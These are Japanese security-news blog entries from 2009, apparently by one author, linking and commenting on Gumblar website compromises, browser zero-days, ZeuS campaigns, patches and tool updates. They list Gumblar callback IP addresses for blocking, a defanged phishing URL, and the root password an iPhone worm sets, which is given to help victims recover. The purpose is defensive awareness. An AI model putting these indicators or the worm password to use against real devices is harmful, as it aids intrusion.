[EMERGENCY] THE MASSIVE COMPROMISED via Gumblar

gnome 2 months, 3 weeks ago on Wordpress

Thanksgiving Day

更生保護記念日(更生保護の日は7/1

ノーベル賞制定記念日 (アルフレッド・ノーベルがノーベル賞創設のための遺言状を記した日)

いい鮒の日 「い(1)い(1)ふ(2)な(7)」

----------

そういうことをするから・・

IEの脆弱性をねらう攻撃コードがより強力に

オープンソースのセキュリティ検証フレームワーク「Metasploit」を開発しているハッカーらが、Internet Explorerに対する攻撃コードを進化させ、その有効性を高めようとしているようだ。

そういうことをするから、Malwareに "Thanks for H.D.Moore"とか書かれるんですよ（笑）

※MetaSploitはRapid7社に買収されています。

米Rapid7、脆弱性検証ツールの「Metasploit」を買収

----------

無料セキュリティソフト選 by cNet

Big changes in Security Starter Kit 2010

PCToolsの統合セキュリティ、「ThreatFire」が高く評価されているようですね。個人的には使ったことがありませんのでちょっと試してみようかな。

NoScriptが４なのは、きっと意味が理解できず削除するひとが多いからなのでしょう・・・

EnigMailは、ローカルに保存されるメールファイルを暗号化するもので、Thunderbirdの必須プラグインのひとつでしょう。

----------

IPA 見直し

事業仕分け結果（２６日）　

ＩＰＡの基金９０億円については売却や国庫返納を求めた。

独立行政法人交付金(2)（日本貿易振興機構、情報処理推進機構、石油天然ガス・金属鉱物資源機構、原子力安全基盤機構）

未踏ソフトウェアはスルー

IPAは例のダメージ以降、よくやってるとは思うんですが、JPCERTや各国CERTとの「連携」等がきちんと機能しているのか不安な面もあります。個人的には、感染サイトの強制テイクダウンなどを視野に入れた方向で各セキュリティベンダーとも連携をとってほしいです。

----------

1und1サーバに異常

openSUSE kernels on 1&1 root servers may be out of date

ドイツ・イギリスでデータセンターを展開している 1und1 が運用している OpenSUSEベースのrootサーバ群において、YaSTが無効化されているため、自動アップデートができず、脆弱性の残ったkarnelの状態でもう数ヶ月も稼動されている可能性があると警告されました。

1und1 使ってる顧客がいるんですが、どうにもなりませんね・・・

※ドイツ国内では圧倒的なシェアを誇っています

----------

ノートン先生も陥落？

Symantecの日韓ユーザー向けサイトに不正アクセス、情報漏えいはなし

Symantecは同社サイトに不正アクセスがあったことを確認した。調査中だが、情報漏えいなどの可能性はないとしている。

不正アクセスがあったのは日本と韓国のNortonユーザー向けにサポートを提供しているWebサイト。同サイトにSQLインジェクションの脆弱性があり、脆弱性を突かれてデータベースへ不正に侵入された。

貫入試験しておきますか？ by MetaSploit

また、アプリケーションベースの仮想化ソリューション "Altiris"にも脆弱性があった模様

Symantec patches Altiris solutions - again

Symantec Altiris ConsoleUtilities ActiveX Control "RunCmd()" Buffer Overflow

指標:4

使用中の方はアップデートしてください。

----------

らんちょんみーと

今日のおしながき：

Macromedia Flash Player 6

Early ecard Christmas malware cheers

※Macromediaは2005/12にAdobeに経営統合されています。

SANTA?

HO HO HO Santa has a virus for you

両方とも、IRC待ち受け型バックドアの亜種です。2008年頃の検体

Free turkey for all!

感謝祭ですしね～

ZeuS

Facebook botnet: Is your computer helping it?

Koobface aim Skype

“New Koobface Variant” Targets Skype

TROJ_VILSEL.EA

見知らぬ人からのコンタクトコールは回避しましょう。

----------

AS12604

AS12604

ウクライナのホストのようですが、なにやら大量に・・・

Oficla/Ofica と呼ばれるトロイの巣窟のようです。

----------

最近多すぎて、時間切れになることが多々・・ますます時間が不足しています。

Updates to my GREM Gold scripts and a new script

Network Forensics Puzzle Contest

※まったくわからなかった・・（泣）

若年層の「Twitter」認知度はわずか5％――モバゲータウン調べ

ふつうのブログvs.短文ブログ: Twitterの伸びは横ばいだがWordPressが急伸

Apple、Psystar への差止命令を裁判所に要請

セキュアブレイン、無料ウイルス対策ソフトの日本語版を公開

Introducing Immunet Protectの日本語版なのに、名前変えてるし・・

「おれがやる」――必然だったサンドボックスの搭載

Yarai

ダウンロードに潜む脅威、ユーザー心理に付け入るサイバー犯罪

by Symantec

ドイツではGoogle Analyticsの利用は個人情報の無断収集で有罪–政府は罰金刑を検討中

この記事の中でドイツの某法律家が、Google Analyticsを使ってビジターの利用パターンを調べているWebサイト一つあたり、罰金の額は最大で5万ユーロ（約75000ドル）ぐらいだろう、と言っている。

怖い・・ｶﾞｸﾌﾞﾙ

AviaryのChrome用エクステンションを試用: ブラウザがまったく遅くならないからすごいね

やっと来た～

FireBug & NoScript だけでもお願いします。 FireMobileSimulatorもできたら・・・

Rogue blogs regirect search traffic to bogus AV sites. Part 1.

Unmask Parasites の記事はよく読まないといけないんですが・・時間がありませんでした

普通のBlogコードへのインジェクションとその隠蔽、RogueAVへの誘導などの話。

---------

謝辞：

security warrior 様

ITPro様の記事ですが、Filterで書き換えを行えばよいのでしょうが、実際にはScriptをブロックすると全く機能しないサイトなどもあり、結局ホワイトリスト形式にするしかなくなります。

だいたい、TLDでブロックするとか、ありえないことが書かれていたので、ちょっと突っ込んでみました（笑）

※国全体ブロックをするなら、IPレンジで弾かないといけません。

国/地域別 IP アドレス割り当てリスト

ITPro様ともども、今後もよろしくお願いします。

----------

| 1259265626 | B | [goog-black-hash 1.45295 update]

| 1259265602 | M | [goog-malware-hash 1.17476 update]

| 371044 | -3038(374082)

| 1051029 |

EoF ... See all content Hide content

Reply

gnome 2 months, 3 weeks ago on Wordpress

ペンの日 (日本ペンクラブ発足の日)

いい風呂の日 「い(1)い(1)ふ(2)ろ(6)」(入浴剤の業界団体「日本浴用剤工業会」制定)

----------

Microsoft Update for..?

Microsoft Updates requiring reboot

We(except Microsoft) were surprised by updates that required reboot.

MSXML XHTML のプロセスにアプリケーションを使用すると、冗長取得要求の W3C Web サーバーからの既知の DTD ファイルを Windows ベースのコンピューターに障害が発生する解析 XHTML を原因します。

[973685] Microsoft XML コア サービス 4. 0 SP3 用の更新

[973687] その他情報を更新します。

[973688] Microsoft XML コア サービス 4. 0 SP2 用の更新

タイムゾーン関連及び、日付表示の細かい修正

[976098] Microsoft Windows オペレーティング システムの 2009年 12 月の累積的なタイム ゾーン更新プログラム

[976470]「日付」範囲 out of エラー メッセージは、"日付と時刻] ウィンドウに表示されます。

W3C関連：

W3C's Excessive DTD Traffic -- 2008.2.8

Yet we receive a surprisingly large number of requests for such resources: up to 130 million requests per day, with periods of sustained bandwidth usage of 350Mbps, for resources that haven't changed in years.

DDoS状態・・・

----------

Internet Week 2009

秋葉原で開催中

H1 インターネットセキュリティ2009

Gumblar、中国のDDoS事情など「脅威のトレンド」振り返る

最後に2010年に向けた話題として、真鍋氏はWindows以外のOSにも注意が必要であること、また、サードパーティ製アプリのアップデートがMicrosoft Updateに統合されることが期待されるとした。

バルマーさん、本気で検討のほど、お願いしますよ～

----------

週間脆弱性 by Hitachi

チェックしておきたいぜい弱性情報＜2009.11.25＞

マイクロソフト2009年11月の月例セキュリティ・アップデート（2009/11/09）

Firefox 3.5.5リリース（2009/11/06）

Mac OS Xのセキュリティ・アップデート2009-006（2009/11/02）

■VMwareに複数のぜい弱性（2009/10/27）

■PHPで開発された複数のWebサイト用プログラムにぜい弱性

----------

うｐだて

Tool updates

WireShark 1.2.4

Truecrypt v6.3

Xplico v0.5.3

NetworkMiner v0.91

使ってるのは、WireSharkかなぁ・・

----------

Thunderbird 3 RC1

Thunderbird 3 RC1がリリース -- Mozilla Flux

Gmailとの統合を強化

送信済みメールやゴミ箱といったGmailの特殊なフォルダをよりよく認識し、統合するようになりました。これは英語版以外のGmailでも同様です。Thunderbirdは「すべてのメール」をアーカイブフォルダとして使用します。

はやくやってほしかった・・泣

----------

Your Name had embedded into PDF

User-generated PDF documents disclose private information - Update

PDF内に（ユーザ名を含んだ）フルパス名が含まれる話で、PowerPointでも同様のことが発生する模様です。

ドキュメント・プロパティの変更によってこのメタデータを保存しない設定にできるようですが、まだチェックしていません。

View or change the properties for an Office document - PowerPoint

----------

アクティブ・スクリプト？

Microsoft Internet Explorer に脆弱性

対策方法

2009年11月25日現在、対策方法はありません。

ワークアラウンドを実施する

対策版が公開されるまでの間、以下の回避策を適用することで、本脆弱性の影響を軽減することが可能です。

* アクティブスクリプトを無効にする

* DEP (Data Execution Prevention) を有効にする

聞きなれない用語ですが、JavaScriptを含む、いくつかのスクリプト言語のことを示しています。(VBScriptとか）

Flashの言語は「アクション・スクリプト」です。

New IE exploit - a good opportunity to upgrade to IE 8?

いい機会であることは事実ですが・・

GumblarもXP駆逐のためのインシデントだという穿った意見もあるようで・・

----------

びみょうに時間切れ：

Make Your Password Secure

無線LANでのクッキー乗っ取りが急増中，オンライン・ショッピングで要注意

Three apps we're thankful for

東京都、出会い系サイトの悪質な手口に注意呼びかけ～1千万円の被害例も

※どっかの出会い系喫茶のサイトがばっちり Gumblar'dでした・・・

Rogue Antivirus Optimized for Windows 7

Sony Ericsson Aino上の「モバイル セキュリティ」

残念ながら、iPhone用のアンチ・ウィルス製品は、どのベンダからも提供されていない。

　iPhone用のこのようなツールを制作するには、Appleの助力が必要だ。しかし、変更が加えられていないiPhoneに影響するワームは存在しないのだから、そうする必要はない（と彼らは考える）わけだ…

No Thanks Koobface

Malware Blocklist Nov25

The malware blocklists here are provided for free for noncommercial use as part of the fight against malware.

Please help to keep this site free! Donate whatever you can, all donations go to hosting and infrastructure costs.

Microsoft issues takedown notices over spilled COFEE

今日は多いんです・・

----------

謝辞

GEEKy Script Writer [perl and more!]の管理人様より、GumblarのRegEdit回避の丁寧な解説と相違点の指摘を頂きました。

勝手に記事引用しているにもかかわらず、訂正の解説まで頂きまして恐縮です。

今後もよろしくお願いいたします。

参照：

11月4日からのGumblarは何が変わったのか

よって、regedit.exeだけなく、他のレジストリエディタでもmidi9の隠蔽が行われると思われる。

実際にいくつかのレジストリエディタで確認したところ、上記(1)から(6)と同じ挙動が確認できた。

ProcMonもフック回避されるとなると手の打ちようがないのかなぁ・・とか思ったり。

※現在、個人の環境・ISPが無いため、会社のPCでGumblarのような剣呑な虫を飼育することができないんです（泣）

前のような実データを下にした解析ができないことをご了承くださいませ。

----------

| 1259179242 | B | [goog-black-hash 1.45223 update]

| 1259179203 | M | [goog-malware-hash 1.17452 update]

| 374082 | -2441 (376523)

| 1047858 |

EoF ... See all content Hide content

Reply

gnome 2 months, 3 weeks ago on Wordpress

オペラ記念日

鰹節の日 「1（い）1（い）2（ふ）4（し）」

大分県地域ブログの日 (thru じゃんぐる公園)

東京天文台設置記念日 (国立天文台)

進化の日(Evolution Day) (1895年、チャールズ・ダーウィンがイギリスで「種の起源」を出版。)

----------

Opera

オペラの日ってわけでは無いのでしょうが（苦笑）、先日発見された穴を塞ぐセキュリティ・アップデートを含む、Opera10.10(Unity)が発表されました。

Opera 10.10 (Opera Unite) for Windows changelog

Advisory: Error messages can leak onto unrelated sites

Advisory: Heap buffer overflow in string to number conversion

尚、この脆弱性は６ヶ月前に発表された CVE-2009-0689 に起因するもので、KDE, Opera, SeaMonkey 及び K-Meleonにも同一起源の穴がある可能性を指摘されています。

Update: New security notes for KDE, Opera, SeaMonkey and K-Meleon

Mozilla:

Mozilla Foundation Security Advisory 2009-59 -- 2009.10.27

Opera patches 'extremely severe' security hole

Opera 10.10 closes "extremely severe" hole

Over time, it emerged that further libc implementations including OpenBSD, FreeBSD and Mac OS X were also affected. Updates have been released for OpenBSD 4.5, NetBSD 5.0 and FreeBSD 7.2/6.4.

PoCらしきものも出ていますので、Operaを使用中の方は 10.10にアップデートしましょう。（ついでにUniteが付いてきます・苦笑）

Opera Web Browser 'dtoa()' Remote Code Execution Vulnerability

----------

IE6/7

Exploit published for critical IE 7 zero-day flaw

Microsoft has not yet issued an advisory with mitigation guidance.

New critical vulnerability in Internet Explorer

This means that IE users can protect their systems by disabling the Active Scripting settings for the internet zone, although as a result, many web pages will no longer function.

Internet Explorer Layout Handling Memory Corruption Vulnerability 指標:4

Disable support for active scripting for all but trusted websites.

IEには NoScriptのように、サイトごとにJavaScriptの許可・不許可の機能が無い（あるいは、信頼するサイトを１こずつ登録）ので、全部切るか脅威を許容するかどちらかしかないということですね。

Internet Explorer Vulnerability Exploit Detected

尚、この件により VUPENが警戒度を上げるように警告しています。

VUPEN Security - Security Threats Watch 24x7

----------

IE8よ、おまえもか

Major IE8 flaw makes 'safe' sites unsafe

Google said

A Google spokesman confirmed there is a "significant flaw" in the IE 8 feature but declined to provide specifics.

“ We're aware of a significant flaw affecting the XSS Filter in IE8, and we've taken steps to help protect our users by disabling the mechanism on our properties until a fix has been released. ”

IE8使ってないのでよくわかりませんが（笑）、IE8のXSSフィルタはブロックするのではなく、脆弱性のあるコードを自動的にre-writeするもので、この部分を悪用した攻撃の可能性が示唆されています。

発見したのがGoogleというのも、いろいろありそうですが・・

----------

Firefoxにも・・

Firefox: Heat and the CPU usage problem

Firefox has a CPU usage issue and, consequently, can cause overheating problems in some laptops, particularly ultraportables. That's what I've found over the last couple of years.

Firefoxが一部のラップトップ機のリソースを喰いすぎて、加熱状態を発生させているという指摘

Firefox consumes a lot of CPU resources

----------

ohshit

下品でごめんなさい・・

Password recovery for the latest iPhone worm

Thanks, however, to John the Ripper, I can tell you that the new password is: 'ohshit'.

新しいiPhone Wormによって、rootのパスワードが書き換えられてしまった方、上述のパスワードを試してみてください（苦笑）

----------

ランチョンミート

Spoofed Trend Micro Email Leads to Phishing Site

hXXp://l.trndmcro.com/rts/{BLOCKED}

うちには来てないので、そんなにメジャーじゃないのでしょうが・・

Phishers Playing Games?

コレ、何のゲームでしょ？（笑）

ZeuS

Zeus' Social Security Statement Spam Campaign

UAB Spam Data Mine finds Social Security Statement Zeus Bot -- GarWarnar

&

Fake Flash Player Zbot spread by "Your Domain" -- GarWarnar

ますます巧妙化、多様化するZeuS攻撃

----------

穴ぼこ

[IN ZERO DAY]

Outreach Project Tool "CRM_path" File Inclusion Vulnerability 指標:4

Outreach Project Tool 最終リリース:2006-09-10

[IN ZERO DAY]

PHP Traverser "GLOBALS[BASE]" File Inclusion Vulnerability 指標:4

PHP Traverser 最終リリース:2004-03-17

----------

DSN-BH

HUGE UPDATE: 4900+ Domains removed

Older domains from 2008, which no longer seem to be associted with malware — over 4900 — have been removed.

(Don’t worry, plenty of new domains will be added in the coming weeks…)

ブラックリストは、追加は楽なんですが、削除の基準とかが大変ですよね。

----------

Google vs (Steve Ballmer & Rupert Murdoch)

Microsoft、マードックと話し合い―本気でBingのためにニュースを札束で買おうとしているのか？

本気（正気）かしらん？

まぁ、お金と権勢を持ってるとこがナリフリ構わない手段に出るとどうなるかはわかりませんが・・・

Murdoch-Microsoft Deal In the Works

----------

| 1259006414 | B | [goog-black-hash 1.45079 update]

| 1259006402 | M | [goog-malware-hash 1.17404 update]

| 376445 |(-1546 : 377961)

| 1036320 |

EoF ... See all content Hide content

Reply

gnome 2 months, 4 weeks ago on Wordpress

和歌山県ふるさと誕生日

いい夫婦の日「いい(11)夫婦(22)」by 余暇開発センター

ボタンの日

大工さんの日

長野県りんごの日

回転寿司記念日 (Conveyor belt sushi)

/----------/

はじめてGumblarに感心した

「１日２０分！在宅ワークで毎月４６万円を稼ぐ方法」

なんてキーワードでコメントスパムを書きまくってる会社のサイトがGumblarに陥落していました（苦笑）

いえ・・ただそれだけなんですけどね・・・

/----------/

IE Zero-day?

Zero-Day Internet Explorer Exploit Published

It affects Internet Explorer versions 6 and 7 as well.

In both cases, the attack requires JavaScript to exploit Internet Explorer.

IE7 Nov 20 2009 06:04PM

どこまで影響があるかは今後の調査待ちですが、結局 JavaScriptなんですねぇ・・

/----------/

ChromeOS

Chrome OS - The good, the bad and the ugly, and how it fits in with Windows, Mac and Linux

ugly:

Then there’s the fact that all this stuff is untested. Even with a year to go until we see Chrome OS on hardware, things could go horribly wrong. There’s plenty of scope for bugs, security issues and data loss.

酷評・・

ちなみにウチの環境下ではまだ起動できてません（泣）

/----------/

SEHOP

Structured Exception Handler Overwrite Protection (SEHOP)

Preventing the Exploitation of SEH Overwrites -- 2006.09

構造化例外処理 (SEH)の上書き防止機能は

Windows Vista SP1やWindows Server 2008でデフォルトで有効状態にされましたが、Windows7ではデフォルトでは無効にされています。

しかし、SEHOPを全部のアプリケーションで有効化すると、一部のアプリケーションには障害が発生します。それでも悪意のあるバッファーオーバーラン攻撃からの防護には有効ですので、「自己責任で」すべてのアプリケーションに適用してください。

というアドバイザリが出されました。

SEHOP per-process opt-in support in Windows 7

しかしこれ、各個のアプリケーションが SEHOPに対応してないのかどうかチェックしてレジストリを弄るのは大変じゃありませんか？（苦笑）

※DEPとの違いがいまひとつ判らない・・・

参考：

Windows における例外ハンドリング -- @a4lg の準技術的日記

/----------/

EXPLO.IT

Milw0rm(作者さんがどうなったのかは誰にも判らない・・）の後継サイトになるのかどうかは不明ですが、

Exploits Databaseがドメインを取得・・その名は・・・

EXPLO.IT

※exploit-db.comにリダイレクトされます

/----------/

Vulnerabilities

[IN ZERO DAY]

KDE:

KDE kdelibs Floating Point Number Processing Memory Corruption 指標:4

KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)

[IN ZERO DAY]

Opera:

Opera Floating Point Number Processing Memory Corruption 指標:4

Opera 10.01 Remote Array Overrun (Arbitrary code execution)

/----------/

SQL Server 2005

SQL Server 2005の更新プログラムで 737d エラーが出てしまう時の対処方法 その２

Windows Update を使用して更新プログラムをインストールすると、エラー コード "737D" が表示される

/----------/

またか・・

[Security-announce] VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components

What is making you vulnerable?

Make sure If you do find old vulnerable versions of software to ask your vendor when they might be addressing it.

現実には、こうしたアドバイザリが出て何も対処しないと「怠慢だ」と怒られ、セキュリティアップデートしたいと言うと「止められない」と怒られるんです・・・

じゃ、どうしろと？

/----------/

けろろ？

Hotmail特定ドメイン（keroro.com）の不具合について

Windows Live Hotmailサービスの特定ドメイン（keroro.com）におけるメールアドレス取得時の不具合について

ケロロ軍曹×WindowsLive 一緒に10周年スペシャル企画　アドレスは早い者勝ちでありますよ?♪ (msn.com) において、メールアドレスの多重受付を許してしまう欠陥があり、後から受付をした人は、以前に受付をした人のアカウントを意図せずに完全に乗っ取ってしまった模様。結果として甚大な情報漏洩・プライバシー侵害が発生した恐れがある。

ああぁっ！（苦笑）

また商品券ネタになるのか？

/----------/

Weastern Digital社製HDDに不具合？

最近全くアンテナを張っていなかったのですが、Seagateが堕ち、HGSTは相変わらずの国内無視政策を続ける中、一人がち（もう１社ありましたっけ？・笑）の感があった WD になにやら問題がある模様・・・

WD10EADSがNG? -- NETGEAR ReadyNAS Forum

Netgear社（※Nortel社から完全分離）製の NAS、ReadyNAS特有の問題のような気もしますが、一応・・・

他社のNAS/Raid Controllerでの、「連続した」不具合報告が見つかっていないのでクラスタ分析的には、あまり騒ぐほどでもない気はします。

/----------/

誰かが飛行機に乗ったら１＄キャッシュバック

Fly for $1 or Your Money Back!

だからそんなイイ話は、何かが潜んでいるんです。

/----------/

| 1258815624 | B | [goog-black-hash 1.44920 update]

| 1258815603 | M | [goog-malware-hash 1.17351 update]

| 378066 | (377144 + 922)

| 1026972 |

EoF ... See all content Hide content

Reply

gnome 3 months ago on Wordpress

山梨県民の日

世界の子どもの日 (Children's Day)

アフリカ工業化の日(Africa Industrialization Day)

毛皮の日 「11、20でいいファー」

ホテルの日

えびす講

ピザの日 (ピッツァ・マルゲリータ)

----------

ZeuSで検挙者

昨日よく読んでなかったNewsの続報

Two Arrested in Connection with Zeus Botnet Package

Two held in global PC fraud probe

Couple arrested in connection with Zbot Trojan horse

日本で横行するマルウェア「Zeus」、関与した2人を逮捕

Zeusを使った攻撃は世界各地で横行しているが、Symantecの10月の統計によると、日本は突出して感染件数が多い。しかし逮捕されたのが作者ではないとすると、Zeusがはびこる状況は今後も続くだろうとSymantecは予想。Sophosでは、今回の逮捕をきっかけにZeusの背後にいる犯罪組織の特定につながれば大きな朗報になると期待を寄せている。

少なくとも金銭の授受はあったはずですから、背後に迫れれば・・・

でもZeuSは今日も元気に働いています

Zeus: Same Criminal, New Spam Infrastructure -- GarWarner

----------

Gumblar's muzzle flashing

【注意喚起】Gumblarおよびその亜種に関する大量の感染事例について

11月16日に最新のJSIG(シグネチャ)を導入した結果、16日と17日のCritical検知数の急増につながっています。

「16日に」急増したのかどうかはわかりませんが・・・

JSOCでは検知データを基に、PCがGumblarおよびその亜種に感染した際にアクセスするIPアドレスを集計しました。

216.45.48.66/32

195.24.76.250/32

67.215.246.34/32

67.215.238.194/32

New Gumblarとその亜種に関する注意喚起

また、追加情報によると、初代GumblerはFTPのアカウント情報が盗まれましたが、今回はウェブサイトの閲覧履歴の情報も持っていかれているようです。

Gumblar再来襲。脆弱性を突くJavaScriptコードが変化。-- 無題なブログ

で、本題ですが、改ざんされたページから不正なコードで導かれた先にある脆弱性を突くJavaScriptコードが従来と違うパターンのものを確認してます（18日あたりから）。Adobe以外に、MDAC（Microsoft Data Access Components）の脆弱性を突くっぽい雰囲気な処理が現れます

MDAC系というと

Microsoft Data Access Components (MDAC) の機能の脆弱性により、コードが実行される可能性がある (911562) (MS06-014)

:CVE-2006-0003

Microsoft Data Access Components の脆弱性により、リモートでコードが実行される (927779) (MS07-009)

:CVE-2006-5559

MS04-003 / MS03-033 / MS02-065 はさすがに無いと思いますが・・・

Where to Look for Gumblar Backdoors

ScanSafeは現在もC&Cを掴みきれて居ない様子ですが、一次、二次の比較的上位の陥落サイトのコントロールを際奪取することが重要だとしています。

Gumblarウイルスが再び猛威、被害の53％は企業サイト--セキュアブレイン調べ

----------

Redmine

Redmine におけるクロスサイトスクリプティングの脆弱性

Redmine におけるクロスサイトリクエストフォージェリの脆弱性

Redmine は、プロジェクト管理ソフトウェアです。Redmine には、クロスサイトリクエストフォージェリ、およびクロスサイトスクリプティングの脆弱性が存在します。

ご使用中の方は 0.8.7 へアップデート

Redmine Cross-Site Scripting and Request Forgery Vulnerabilities 指標:3

----------

Serv-U FTP

最新版： 9.1.0.2 (脆弱性修正は 9.1.0.0)

RhinoSoft Serv-U Two Buffer Overflow Vulnerabilities 指標:4

----------

Fedora 12

rootパスワード無しでソフトウェアをインストール可能という話・・・

Fedora to allow the installation of packages, without root privileges?

Non-privileged users may install software.

Fedoraですし、あっても問題ないような気もしますが・・・

----------

Chrome OS launched

Introducing the Google Chrome OS

Releasing the Chromium OS open source project

Google Chrome OS will be ready for consumers this time next year. Sign up here for updates or if you like building your operating system from source, get involved at chromium.org.

Inside the Google Chrome OS security model

早く入手したいなぁ～

※決してGoogle帝国の一員ではありませ・・・

----------

Twitter spam

Twitter spam explosion

Tomorrow's spam - today

SNS上で金に目がくらんでも、いいことはありませんよ・・たぶん・・

----------

Sexy Video invited..

Malicious Java Applet Poses as Carrie Prejean Video

Carrie Prejean Sex Tape: Video "Biggest Mistake of My Life" Says Ex-Miss California USA

美しい女性に目がくらんでも、いいことはありませんよ・・たぶん・・

----------

Firefox4 vs IE9

Firefox 4.0はIE9より先に登場し、機能で上回る -- Mozilla Flux

［速報］Internet Explorer 9初披露、HTML5対応、DirectXで描画。Silverlight 4は今日からβ公開 -- Publickey

----------

FBIより逮捕状

JNSAを騙った「脅しメール」にご注意ください

2009年11月18日、JNSAを騙った「脅しメール」が出されていることを確認しました。

　メール本文には、英文にてJNSAの名前、住所、電話番号等が記載され、 FBIによりテロ行為へ関わったとして逮捕状が出ている、ネットワークについても監視されている、関与していないという書類を用意しなければ ○月○日に逮捕する、FBIからの指示に従え、という内容です。

　JNSAでは、このようなメールは一切送付しておりません。 　現時点ではウイルスなどは確認されておりませんが、ご注意いただけますようお願い致します。

----------

MSRT report

A Peek at MSRT November Threat Reports

最終防壁と称される（私だけかナ？）MSRTの感染レポート

----------

Yahooで検索するものは？

ヤフー、2009年検索トップは「YouTube」 - 人名ランキングも発表

4位 Google

たぶん Googleでは Yahoo を検索しているんですよ（苦笑）

2009検索ワードランキング

----------

unfriend

Security Wars: 3. 社会と暗黒のハッカーとの闘い

技術の誇示でPoCを公表するのは悪だと・・・？

----------

unfriend

「unfriend」がOxford University Pressの今年の新語大賞に

I decided to unfriend my roommate on Facebook after we had a fight.

----------

GSB:

| 1258660814 | B | [goog-black-hash 1.44791 update]

| 1258660802 | M | [goog-malware-hash 1.17308 update]

| 374818 |

| 1014380 |

EoF ... See all content Hide content

Reply

gnome 3 months ago on Wordpress

土木の日 「土木」の「土」が十一 (11) 、「木」が十八 (18)

雪見だいふくの日

「いい」という文字が11月を表していて、雪見だいふくのパッケージを開けたときに､タテにみるとスティックの部分が｢1｣､2つの雪見だいふくの部分が｢8｣で､｢18｣に見えることから、｢雪見だいふく｣=｢18｣となることが由来。

ミッキーマウスの誕生日

音楽著作権の日 日本音楽著作権協会(JASRAC)設立

カスピ海ヨーグルトの日

ボジョレー新酒解禁まであと１日！

今年のボジョレー・ヌーヴォーは? - フランスよりぶどうの収穫情報が到着

----------

Wikipedia thru Firefox

いつもお世話になっております Wikipediaですが・・

Wikipedia Toolbar Cross-Context Scripting Vulnerability

Wikipedia ToolbarにXSS脆弱性が発覚したようです。（私はつかってなかったですが・・・）

ご使用中の方は最新版：

Version 0.5.9.2

----------

脆弱性情報 by HITACHI

恒例の「週刊脆弱性」

チェックしておきたいぜい弱性情報＜2009.11.17＞

今回のメニューは

Shockwave Playerのセキュリティ・アップデート（2009/11/03)

JDK/JRE 6のセキュリティ・アップデート（2009/11/03）

Snort 2.8.5.1リリース（2009/10/22）

X.509証明書ドメイン名処理のぜい弱性（2009/10/23）

SquidGuardにバッファ・オーバーフローのぜい弱性（2009/10/15）

正直、Shockwave Player はアンインストールしたほうがいいような気もします。

----------

Firefox 3.6での変更点

セキュリティ・アドバイザリのほうにこんなPostが

Component Directory Lockdown – New in Firefox 3.6

In Firefox 3.6, we are changing the way that some third party software hooks into Firefox which should eliminate a good chunk of those crashes without sacrificing our extensibility in any way.

Firefoxのクラッシュを減らす車の両輪とは -- Mozilla Flux 2009.11.09

3.0xの頃からは少なくなったとはいえ、毎日１－２回はクラッシュしていますね（笑）

期待しておきましょう。

----------

OpenVPN update regarding CVE-2009-3555

水面下で波紋を広げている SSLv3/TLS問題ですが、OpenSSLが暫定措置的な修正を行ったことを受けて、OpenVPNも修正を発表しました。

OpenVPN Fixed OpenSSL Session Renegotiation Issue

OpenVPN 2.1_rc21

しかし・・VPNとか簡単に止められないんですよね・・（苦笑）

担当の方は、何かのタイミングを計ってアップデートを検討しましょう。

----------

Web Blockerは役に立つのか？

jyake様がUnmaskParasitesのCompromiz'dListを元に、Google Safe Browsing、Norton Safe Web、McAfee Site Advisor で調査した結果を発表されました。

Gumblarのブロック状況の例

お疲れ様です。

GSBはShellでやってるので楽なんですが、他は全部１個１個チェックしないといけないので大変です（苦笑）

しかし、ふと考えると、一度でもリストに載ったドメイン、URLは一生前科モノ扱い？ってことになっちゃうものなんですかね。

Googleの場合、検索結果に「このサイトはコンピュータに損害を与える可能性があります。」が出ますので、嫌でも解除しようとするはずですが・・Norton/McAfee/WoTなどは自分がブロックされているのに気が付かないケースが多いのではないでしょうか？

たとえば、WoTは再評価を申請しても、評価が上がるまでには時間がかかるため、一度レッテルを貼られるとなかなか復旧しませんね。（某ナウでヤングなサーバなんか真っ赤です・・）

----------

後悔先立たず

初のiPhoneワームの作者、「こんなに広がるとは」と後悔

iPhoneに感染する初のワームを作成した青年は、多くの人から脅迫を受け、「行動する前にもっと考えるべきだということを学んだ」と話している。

それ以前に、Ransomの身代金を要求した時点で犯罪確定です。

----------

こんなこといっていいのかなぁ？

Gumblar（ガンブラー/別名 GENO）の新しい亜種にご注意を | 製品情報 | JUST Kasperskyポータル

日本国内で販売されているアンチウイルス製品・サービスにおいて

・PDF形式

・SWF形式（Adobe Flashのファイルフォーマット）

に対応しているのは、カスペルスキーのみです。（2009年10月22日時点）

（苦笑）

----------

Post Milw0rm

こないだハッキングを受けていたサイトなので・・一応自己責任で

The Exploit Database

tttt://exploits.offensive-security.com/

緑色がグレーベースに変わっただけですね・・

----------

OWASP Top10 will Change

Webアプリケーションのセキュリティ向上を目的としたワークグループOWASPのメインストリームである、「OWASP Top Ten Project」は、2010年版に向けたリリース候補版を発表しました。

参考：

Webアプリケーションを作る前に知るべき10の脆弱性

----------

私信1：Ilion様へ

　フレッツとかの申し込みの際に接続機器1台で申請すると

　NTTから送られてくる機器にルーターが付属しないんです

　(正直に1台で申請して直結だった知人には後でルーターを買わせました)。

　嘘でも3台とか書いておくといいです。

なるほど～

新規に回線を引く人はそうしましょう！（笑）

ありがとうございました。

私信2：hoaxさんへ

メールが全部「配信できないよ！」で帰ってきています（笑）

----------

GSB status:

| 1258488048 | B | [goog-black-hash 1.44647 update]

| 1258488002 | M | [goog-malware-hash 1.17260 update]

| 367027 |

| 996237 |

100万目前！

EoF ... See all content Hide content

Reply

gnome 3 months ago on Wordpress

幼稚園記念日

録音文化の日

いいいろの日

----------

月曜の朝なので、まだ何もありませんが・・・

----------

Gumblar CompromiZed List

Unmask Parasitesが Gumblar.Xの陥落サイトリストを更新中です

現時点で 245・・・

きりが無いといえばそれまでなんですが、とりあえずGoogleセンセへお問い合わせ：

あまりにも長すぎるので別紙

という感じで、割とブロックしてる感じですね

もっとも、ここに上げられていないものが遥かに多いのですが・・・

----------

JUST RUN

家庭内ITサポートの荷を軽くするには？

「身内」ってのがどの辺なのか？にもよりますが、危なそうなら最新OSを使わせるのが一番ですね。Skypeに画面の共有機能がありますので、リモート操作ではなく、画面を見ながら相手に操作させることも可能になりました（感謝！）　ハードウェアレベルの障害で無い限りは、概ね平穏になりましたね。

問題は身内で無い場合・・・

特にウィルス感染した友人の友人の・・（以下略）なんて環境へのインストラクションなんか絶対に無理だと悟りました・・・

----------

財布へ

Best Tool For Remembering Passwords?

パスワード管理の秘策は？

